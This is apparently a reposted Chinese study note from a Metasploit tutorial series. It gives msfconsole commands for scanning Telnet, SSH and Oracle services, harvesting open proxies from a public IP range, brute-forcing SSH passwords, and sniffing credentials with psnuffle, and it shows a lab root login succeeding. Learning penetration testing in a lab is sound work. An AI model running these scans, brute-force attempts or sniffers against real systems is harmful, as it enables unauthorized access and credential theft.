3.3服务扫描与查点
来源:互联网 发布:kinect for windows 编辑:程序博客网 时间:2024/06/15 01:29
msf > search name:_version 服务查点辅助模块
一,常见的网络服务扫描
1.Telnet服务扫描
use auxiliary/scanner/telnet/telnet_version
set rhosts 10.10.10.0/24
set threads 100
run
无结果
2.ssh服务扫描
代替了telnet,具有安全性
use auxiliary/scanner/ssh/ssh_version
set rhosts 10.10.10.0/24
set threads 100
run
3.Oracle数据库服务查点
漏洞频发重灾区
Microsoft SQL Server 1433
Oracle SQL 监听器(tnslsnr) 1521
use auxiliary/scanner/oracle/tnslsnr_version
set threads 50
run
4.开放代理探测与利用
网络隐藏身份:代理服务器(proxy),VPN
open_proxy模块,获取免费的HTTP代理服务器地址
use auxiliary/scanner/http/open_proxy
set site www.google.com
set rhosts 24.25.24.1-24.25.24.254
set multiports true
set verify_connect true
set threads 100
run
更好的是vpn服务,可以自主架设OpenVPN
二,口令猜测与嗅探
1.ssh服务口令猜测
use auxiliary/scanner/ssh/ssh_login
set rhosts 10.10.10.254
set username root (也可以用user_file)指定多个用户名
set pass_file /root/words.txt (就在linux下的root里创建字典
(可以用userpass_file代替上面2个参数,用户口令字典)
set threads 50
run
10.10.10.254:22 SSH - Failed: 'root:123456'
[+] 10.10.10.254:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root)
Linux metasploitable 2.6.24-16-server #1
SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
即获取了一台服务器访问权
2.psnuffle口令嗅探
截获常见协议的身份认证过程,讲用户名和口令信息记录下来
只有在能够接入对方网络的初始访问点
use auxiliary/sniffer/psnuffle
run
- 3.3服务扫描与查点
- 服务扫描与查点
- metasploit 情报搜集技术【3】服务扫描、查点、口令猜解与嗅探
- metasploit学习笔记之服务扫描和查点
- Nmap源码分析(服务与版本扫描)
- 琦丰东条英机景送去上处查点景
- 批量主机服务扫描
- 主动扫描与被动扫描
- WEB渗透测试之查点
- nmap扫描特定的服务
- Oracle服务扫描工具Oscanner
- 浅谈TCP扫描与SYN扫描与FIN扫描
- index 与全盘扫描
- 逐行扫描与隔行扫描
- Metasploit与漏洞扫描
- 二维码读取与扫描
- 二维码生成与扫描
- 二维码生成与扫描
- web.xml & web-fragment.xml (Servlet 2.3, 2.4, 2.5 + 3.0)模板
- 3.2主机探测与端口扫描
- XML学习笔记(一):XML基础及语法
- Unity发布Android安装文件
- 排序—希尔排序
- 3.3服务扫描与查点
- poj 2406 kmp求连续重复子串的个数
- Groovy闭包深入学习
- mysql默认引擎MyISAM引起的spring事务/session缓存失效
- 3.4网络漏洞扫描
- 超简单的麻将算法
- ML的BD框架-Hadoop.Mahout.Strom.Spark/GraphLab
- 迪克斯特拉算法(Dijkstra)
- 李一男离开华为时给属下的忠告